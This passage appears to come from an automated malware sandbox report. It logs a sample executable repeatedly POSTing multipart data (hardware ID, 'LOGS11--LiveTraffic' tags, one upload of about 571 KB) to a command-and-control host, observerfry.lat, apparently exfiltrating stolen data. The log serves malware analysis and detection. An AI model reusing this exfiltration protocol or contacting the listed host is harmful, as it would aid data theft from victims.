                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 71 34 2f 72 67 53 6b 6f 59 41 65 36 65 78 4e 6d 72 51 42 59 75 70 51 53 54 6b 30 39 6d 57 6a 42 63 50 54 6c 6f 32 47 51 4f 30 44 71 72 2f 32 49 50 44 64 2f 4b 4c 70 37 57 33 48 71 47 42 79 34 6c 56 51 61 42 7a 57 4d 59 73 4a 71 76 61 7a 74 61 59 74 70 47 61 65 46 2f 35 51 68 4a 58 55 46 73 58 73 64 62 36 45 4c 55 4c 69 63 48 30 31 4c 66 4e 41 6d 79 47 44 30 38 36 4e 49 67 32 67 50 71 59 44 6d 68 54 56 68 62 55 65 75 4e 42 78 69 35 46 6b 63 76 4a 49 66 52 6b 63 77 6e 6d 4c 43 65 4b 61 6b 35 47 47 42 63 41 71 67 69 65 71 59 4a 69 70 39 44 36 56 34 46 58 79 68 45 30 37 2f 31 31 52 46 58 33 7a 47 4a 76 6c 2f 70 4c 76 67 4a 4c 6c 74 47 37 79 46 34 4a 39 75 50 6a 77 51 39 33 4d 58 4c 76 78 42 57 72 43 51 46 30 31 47 4e 5a 4a 72 79 6e 47 78 71 75 56 69 67 6e 45
                                                                                                                                            Data Ascii: q4/rgSkoYAe6exNmrQBYupQSTk09mWjBcPTlo2GQO0Dqr/2IPDd/KLp7W3HqGBy4lVQaBzWMYsJqvaztaYtpGaeF/5QhJXUFsXsdb6ELULicH01LfNAmyGD086NIg2gPqYDmhTVhbUeuNBxi5FkcvJIfRkcwnmLCeKak5GGBcAqgieqYJip9D6V4FXyhE07/11RFX3zGJvl/pLvgJLltG7yF4J9uPjwQ93MXLvxBWrCQF01GNZJrynGxquVignE
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 59 78 67 4f 44 49 4f 75 7a 52 44 4c 71 63 47 58 37 36 54 48 55 35 49 4f 35 70 30 78 58 2b 6d 71 75 4a 74 68 58 63 59 70 34 50 6e 6b 69 63 73 66 67 53 77 63 78 52 72 35 45 38 63 75 49 46 55 47 67 63 64 6b 32 33 44 49 2b 37 72 2f 43 69 52 4f 78 2b 6d 7a 72 58 54 4c 69 74 33 41 37 70 33 46 47 32 32 41 46 71 74 6d 52 6c 49 56 54 61 56 59 38 4a 31 75 61 6a 6c 59 49 4e 33 43 71 4f 4f 37 70 68 75 62 7a 49 4f 72 7a 52 44 4c 6f 63 57 53 72 57 65 47 46 52 4d 50 5a 31 77 77 6d 6a 30 35 61 4e 33 6a 32 70 59 38 70 6a 39 68 43 6b 2b 50 42 44 33 63 78 63 75 2f 45 46 61 74 70 38 54 52 45 6b 75 6d 32 44 41 64 37 32 69 35 32 36 4c 65 78 79 75 69 65 69 51 49 69 70 31 43 72 68 77 45 6d 43 74 44 68 7a 78 32 52 4e 61 42 32 54 65 52 39 52 37 75 4b 61 6a 65 63 5a 69 57 4b 32 43
                                                                                                                                            Data Ascii: YxgODIOuzRDLqcGX76THU5IO5p0xX+mquJthXcYp4PnkicsfgSwcxRr5E8cuIFUGgcdk23DI+7r/CiROx+mzrXTLit3A7p3FG22AFqtmRlIVTaVY8J1uajlYIN3CqOO7phubzIOrzRDLocWSrWeGFRMPZ1wwmj05aN3j2pY8pj9hCk+PBD3cxcu/EFatp8TREkum2DAd72i526LexyuieiQIip1CrhwEmCtDhzx2RNaB2TeR9R7uKajecZiWK2C
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 45 71 53 5a 64 2f 44 57 75 6a 46 78 36 4b 6d 68 70 4d 51 43 72 65 65 66 41 32 39 4b 54 35 4a 74 42 43 41 65 71 4a 34 64 4e 32 59 57 63 4f 74 33 4d 42 65 4b 4d 4e 54 62 53 55 47 47 42 49 4f 34 68 6c 77 48 75 6c 6f 71 39 74 68 54 74 57 36 6f 6e 31 30 33 5a 68 58 51 36 68 64 7a 52 74 74 51 67 63 38 64 6b 54 56 41 64 6b 33 6c 69 50 61 72 65 37 34 47 6d 5a 52 56 6a 79 6c 39 50 54 4a 54 64 31 47 62 52 69 45 47 4f 6f 45 47 4c 2f 77 55 41 51 46 57 37 4d 4e 4e 41 34 71 35 53 74 4a 6f 6b 37 51 4a 4f 58 72 59 56 75 65 53 42 48 39 32 5a 62 4e 75 52 47 58 36 32 4c 45 6b 46 52 50 39 6c 59 38 56 2b 69 6f 65 52 32 6a 32 77 58 36 73 43 74 6e 47 35 35 53 30 6d 2b 63 77 42 2f 73 67 78 4d 75 4e 6b 72 44 41 63 6b 33 6a 36 50 54 62 65 6c 37 57 47 65 61 6c 57 4e 6d 4f 65 55 50
                                                                                                                                            Data Ascii: EqSZd/DWujFx6KmhpMQCreefA29KT5JtBCAeqJ4dN2YWcOt3MBeKMNTbSUGGBIO4hlwHuloq9thTtW6on103ZhXQ6hdzRttQgc8dkTVAdk3liPare74GmZRVjyl9PTJTd1GbRiEGOoEGL/wUAQFW7MNNA4q5StJok7QJOXrYVueSBH92ZbNuRGX62LEkFRP9lY8V+ioeR2j2wX6sCtnG55S0m+cwB/sgxMuNkrDAck3j6PTbel7WGealWNmOeUP
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 36 65 31 64 67 72 77 46 62 72 34 38 50 44 6b 38 2f 68 48 7a 78 52 70 2b 6e 35 57 47 53 66 42 36 4d 72 71 33 64 62 69 34 79 55 59 34 30 55 79 36 62 54 78 79 6e 32 55 77 43 63 6a 2b 51 61 4d 68 75 70 65 62 4c 52 62 4a 42 57 6f 61 4a 2b 4e 45 61 4a 6d 49 59 76 48 6b 58 4c 75 70 42 57 76 2f 42 52 41 77 48 4f 49 38 6d 6c 79 6a 6d 38 4c 59 31 33 79 74 4b 74 63 44 30 30 7a 68 68 4b 6c 76 35 4e 41 6b 75 2f 45 45 62 76 49 73 47 52 45 51 71 6e 53 48 78 52 70 4f 6c 35 47 65 65 61 77 2b 6c 73 4e 4f 47 4c 53 39 38 44 71 46 6c 57 79 44 6b 44 68 7a 6e 6f 46 51 4b 42 77 50 51 4a 74 63 34 37 4f 76 57 5a 59 5a 31 48 37 79 66 6f 4c 51 67 4a 6e 4d 66 70 32 4d 55 4c 75 70 42 57 76 2f 42 52 67 77 48 4f 49 38 6d 6c 79 6a 6d 38 4c 59 31 33 79 74 4b 74 63 44 30 30 7a 68 68 4b 6c
                                                                                                                                            Data Ascii: 6e1dgrwFbr48PDk8/hHzxRp+n5WGSfB6Mrq3dbi4yUY40Uy6bTxyn2UwCcj+QaMhupebLRbJBWoaJ+NEaJmIYvHkXLupBWv/BRAwHOI8mlyjm8LY13ytKtcD00zhhKlv5NAku/EEbvIsGREQqnSHxRpOl5Geeaw+lsNOGLS98DqFlWyDkDhznoFQKBwPQJtc47OvWZYZ1H7yfoLQgJnMfp2MULupBWv/BRgwHOI8mlyjm8LY13ytKtcD00zhhKl
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 61 65 59 68 57 36 6d 61 56 41 77 48 4d 4e 34 2b 6a 33 6d 2b 75 2b 35 70 6a 7a 63 66 73 49 6d 74 33 57 34 76 4d 6c 48 33 64 52 46 2b 71 51 35 62 38 35 38 61 54 41 63 6a 30 48 2b 50 62 76 54 7a 73 43 6a 49 61 56 6a 79 7a 71 71 51 50 44 4e 30 43 71 46 33 58 46 43 61 4c 45 36 34 69 52 63 41 64 6a 47 61 63 4e 70 37 70 4b 7a 64 57 4b 56 70 48 37 71 4e 72 36 49 34 49 6e 49 48 73 44 52 56 4c 72 78 42 42 50 2b 30 42 6b 56 58 50 39 34 6f 6a 33 54 30 38 36 4e 72 6d 6e 77 49 71 63 4c 71 69 53 6c 68 62 55 65 75 4e 41 30 75 2f 46 49 53 2f 34 74 55 47 67 64 37 6b 47 76 4f 65 37 71 6f 38 58 53 4f 65 41 36 70 79 64 4f 74 41 7a 4e 31 47 62 51 32 4b 6d 4f 67 46 30 6d 38 69 52 4e 38 65 52 47 4d 59 64 39 37 39 6f 66 6b 61 34 52 46 4a 70 32 66 36 6f 4e 73 42 33 45 66 74 44 52
                                                                                                                                            Data Ascii: aeYhW6maVAwHMN4+j3m+u+5pjzcfsImt3W4vMlH3dRF+qQ5b858aTAcj0H+PbvTzsCjIaVjyzqqQPDN0CqF3XFCaLE64iRcAdjGacNp7pKzdWKVpH7qNr6I4InIHsDRVLrxBBP+0BkVXP94oj3T086NrmnwIqcLqiSlhbUeuNA0u/FIS/4tUGgd7kGvOe7qo8XSOeA6pydOtAzN1GbQ2KmOgF0m8iRN8eRGMYd979ofka4RFJp2f6oNsB3EftDR


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.1049719104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:25 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=P6HQ0NNFDA95PII8
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 12841
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:25 UTC12841OUTData Raw: 2d 2d 50 36 48 51 30 4e 4e 46 44 41 39 35 50 49 49 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 44 30 32 36 39 41 44 41 37 43 44 36 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 36 48 51 30 4e 4e 46 44 41 39 35 50 49 49 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 36 48 51 30 4e 4e 46 44 41 39 35 50 49 49 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                            Data Ascii: --P6HQ0NNFDA95PII8Content-Disposition: form-data; name="hwid"AAD0269ADA7CD62DAC8923850305D13E--P6HQ0NNFDA95PII8Content-Disposition: form-data; name="pid"2--P6HQ0NNFDA95PII8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                            2024-12-23 16:20:26 UTC1129INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:26 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=i8f1k609pa1ofco88ib13o8r5i; expires=Fri, 18 Apr 2025 10:07:05 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TcZfimlqfGeMWeMGOxDclKEXo6ZJfDCHqfGEixk25YxXgQHrRnf4s8RU%2BU%2BwmLeZ3P4WSwxpQhy4wsvGaAjMP14cLSSarNWY%2FthEjRAOLZxqE%2BXYFQ1iWTqz07i4JEFlLSw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69adcb6f1a43bb-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2095&min_rtt=1690&rtt_var=923&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13778&delivery_rate=1727810&cwnd=228&unsent_bytes=0&cid=0d0d96a16e4ca045&ts=1350&x=0"
                                                                                                                                            2024-12-23 16:20:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-23 16:20:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.1049725104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:28 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=DMF4MXVT43YC3GXY7
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 15074
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:28 UTC15074OUTData Raw: 2d 2d 44 4d 46 34 4d 58 56 54 34 33 59 43 33 47 58 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 44 30 32 36 39 41 44 41 37 43 44 36 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 4d 46 34 4d 58 56 54 34 33 59 43 33 47 58 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 4d 46 34 4d 58 56 54 34 33 59 43 33 47 58 59 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                            Data Ascii: --DMF4MXVT43YC3GXY7Content-Disposition: form-data; name="hwid"AAD0269ADA7CD62DAC8923850305D13E--DMF4MXVT43YC3GXY7Content-Disposition: form-data; name="pid"2--DMF4MXVT43YC3GXY7Content-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                            2024-12-23 16:20:29 UTC1140INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:28 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=71shbf4elhrhnel6i1qpu5unnv; expires=Fri, 18 Apr 2025 10:07:07 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=huhuf7U2T5%2FswiPz1B0B%2Bc8F37M6451dW7IZaEW02wQCa%2F%2Bmyy%2BU3U%2Fo1v01%2FTrnjzjnZre8qYeEtdN1kS%2FBEFG8zaEO7uJtcR9e5SM20LU%2BWNQIHobGSQ%2FgrJlOuEU8GPw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69addc5c6e2394-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1944&rtt_var=737&sent=8&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16012&delivery_rate=1475492&cwnd=252&unsent_bytes=0&cid=fe95c492a9d2e36e&ts=995&x=0"
                                                                                                                                            2024-12-23 16:20:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-23 16:20:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.1049731104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:30 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=AFMYWLKSIOFD
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20406
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:30 UTC15331OUTData Raw: 2d 2d 41 46 4d 59 57 4c 4b 53 49 4f 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 44 30 32 36 39 41 44 41 37 43 44 36 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 46 4d 59 57 4c 4b 53 49 4f 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 46 4d 59 57 4c 4b 53 49 4f 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 46 4d 59 57 4c 4b 53
                                                                                                                                            Data Ascii: --AFMYWLKSIOFDContent-Disposition: form-data; name="hwid"AAD0269ADA7CD62DAC8923850305D13E--AFMYWLKSIOFDContent-Disposition: form-data; name="pid"3--AFMYWLKSIOFDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--AFMYWLKS
                                                                                                                                            2024-12-23 16:20:30 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: lpQ0/74G6(~`~O
                                                                                                                                            2024-12-23 16:20:32 UTC1126INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:31 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=fpvj8gvjc6l0qf5ga70u11sf32; expires=Fri, 18 Apr 2025 10:07:10 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QA64Dw3GUW0bzqMh9at8t0w1ysDhm1n630ivdiYkTOoB0FfNH%2F92rqo2cy7ZK3YhbKeExvg1kaN73yt0uGZ1MqMCsRTku7l4wEPts0XKfvG7RBvsmb6UwvlWqJebqW0gQ%2Fw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69adedb88a433f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1575&rtt_var=614&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21361&delivery_rate=1750599&cwnd=219&unsent_bytes=0&cid=ab2781e98509d66a&ts=1279&x=0"
                                                                                                                                            2024-12-23 16:20:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-23 16:20:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.1049738104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:33 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=5W82Y2VIL7Z8
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1230
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:33 UTC1230OUTData Raw: 2d 2d 35 57 38 32 59 32 56 49 4c 37 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 44 30 32 36 39 41 44 41 37 43 44 36 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 57 38 32 59 32 56 49 4c 37 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 57 38 32 59 32 56 49 4c 37 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 57 38 32 59 32 56 49
                                                                                                                                            Data Ascii: --5W82Y2VIL7Z8Content-Disposition: form-data; name="hwid"AAD0269ADA7CD62DAC8923850305D13E--5W82Y2VIL7Z8Content-Disposition: form-data; name="pid"1--5W82Y2VIL7Z8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5W82Y2VI
                                                                                                                                            2024-12-23 16:20:34 UTC1126INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:34 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=uahet1c4es08ptasseunnfgfq7; expires=Fri, 18 Apr 2025 10:07:13 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nKulTS7IWMt3B2el35RZZdxv2Xo%2FxsoCUnoXkoKVV%2B3sECqfglLxTcjcAgwkZqp1cydraxtMdqP%2BgUFESAKTo2L0Z946FObJ36ZcV2vd3D07u8Hk%2Bcdf4bewhGD5N1mrJgU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69adffcc294321-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1613&rtt_var=610&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2140&delivery_rate=1784841&cwnd=249&unsent_bytes=0&cid=bda8d94e276130dd&ts=781&x=0"
                                                                                                                                            2024-12-23 16:20:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-23 16:20:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.1049749104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:36 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=5UTL55JDRO0MD
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 571392
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:36 UTC15331OUTData Raw: 2d 2d 35 55 54 4c 35 35 4a 44 52 4f 30 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 44 30 32 36 39 41 44 41 37 43 44 36 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 55 54 4c 35 35 4a 44 52 4f 30 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 55 54 4c 35 35 4a 44 52 4f 30 4d 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 55 54 4c 35
                                                                                                                                            Data Ascii: --5UTL55JDRO0MDContent-Disposition: form-data; name="hwid"AAD0269ADA7CD62DAC8923850305D13E--5UTL55JDRO0MDContent-Disposition: form-data; name="pid"1--5UTL55JDRO0MDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5UTL5
